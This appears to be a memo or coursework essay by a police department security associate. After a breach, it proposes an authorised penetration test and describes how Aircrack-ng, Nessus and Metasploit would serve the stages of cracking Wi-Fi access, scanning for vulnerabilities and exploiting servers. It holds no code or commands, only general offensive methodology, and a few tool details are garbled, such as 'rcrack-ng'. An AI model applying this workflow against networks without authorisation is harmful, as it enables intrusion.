As a result of the media exposure surrounding the City Police Departments new police chief hire, the data network that supports the department was targeted and compromised. Our examinations, so far, have found that the data integrity of one of our servers has been compromised and a plain text file was placed on the server without our knowledge. Though the extent of the compromise has not yet been fully determined, it is my recommendation that we commission an investigation by a third party security organization to do a root cause analysis. In the meantime, our initial response has been decided by management. We will begin a network penetration test on our network infrastructure to identify and exploit any gaping security holes (white hat). Knowing what happened that led to this compromise is of great importance, but of even greater importance is to look for any security flaws we find so that we arent compromised again in the immediate future.
To undertake this task of conducting a penetration test to find the holes in our network infrastructure we will need penetration testing tools. I have decided on the following three penetration testing tools: Aircrack-ng, Nessus and Metasploit.
Descriptions and Limitations of Selected Tools
Aircrack-ng Aircrack-ng is a group of wireless exploitation tools that allows an attacker to penetrate an organization or persons wireless network. According to Henry Dalziel from concise-courses.com, aircrack-ng is made up of several different programs that include: rcrack-ng (which can cracks WEP and WPA Dictionary attacks), airdecap-ng (which can decrypts WEP or WPA encrypted capture files), aireplay-ng (which is a packet injector), airodump-ng (which is a packet sniffer), and several others. (http://www.concise-courses.com/security/top-ten-pentesting- tools/) Aircrack-ng is limited to the use of being an infiltration and wireless network access tool. This limitation makes it good for getting network access to an organization or individual but other tools would be require to completely penetrate a network.
Nessus Nessus is a vulnerability scanning tool. It scans a targets IP and ports against a database of known signatures. When a scan is complete and match is found, Nessus gives a list of the discovered vulnerabilities. These vulnerabilities can take the form of security holes, default/common passwords, legacy exploits, zero day exploits or even misconfiguration. Though Nessus has the ability to look for vulnerabilities, its capabilities outside of scanning are limited. Though it does an amazing job at identifying potential attacks against a target, it cannot exploit targets natively. Nessus biggest limitation in my opinion is its reliance on known signatures to trigger alerts. In other words, it can only find Vulnerabilities it specifically has updated information on.
Metasploit Metasploit is a database of security vulnerability code and tools that helps security professionals and hobbyists alike explore and exploit computer weaknesses. Metasploit is one of the most, if not the most, popular security tools used by information security and penetration testers around the world. Its limitations are that Metasploit has a steep learning curve. For the more complicated exploits you have an understanding of computer logic and knowledge of how to program in a few different languages (Python, C, etc.) in order to get the most out of it.
Performing a network penetration test
By themselves, Aircrack-ng, Nessus and Metasploit do not have enough functionality to complete a penetration test. That is why we will use each of the 3 tools for a specific phase of the entire Penetration test. To begin, I would start with using the Aircrack-ng suite to get network access while outside of the Police Station (War driving). This would allow me a bit of anonymity (reducing my risk of being discovered) while giving me a good chance to crack the WPA2 protection and gain entry into the Police Stations wireless network. Assuming everything goes as planned, once I attain network access I would then use the Nessus Vulnerability Scanner to map and search for vulnerable targets. The Nessus scanner is automated and will search out any connected network in order to find banners, server versions, protocols open/running, etc. With this information, Nessus is able to match the discovered servers to profiles it keeps in its database. When a match is found, Nessus will display a report of vulnerabilities based on that discovered servers information and then rank those vulnerabilities by severity level. The higher the severity, the greater the risk. Those servers with high risks and available exploits are the servers I will attack. Once the vulnerabilities are exposed then a server with a high likelihood of being compromised will be selected. The selected server should be the highest value target thats the easiest to exploit; Thats where Metasploit would become useful. I would use the Metasploit Open Source project to find specific relevant exploit tools or code that matches the weakness (discovered by Nessus) in my server. Once I have network access, a target and code to exploit my target I can change the Metasploit provided attack scripts to fit the network I want to attack and begin my exploit.
Conclusion
It is my professional recommendation that we move forward with acquiring these 3 testing tools as soon as possible. Our network has been compromised and we have to take decisive yet swift action in order to adopt a more secure network environment.
. Information Security Associate City Police Department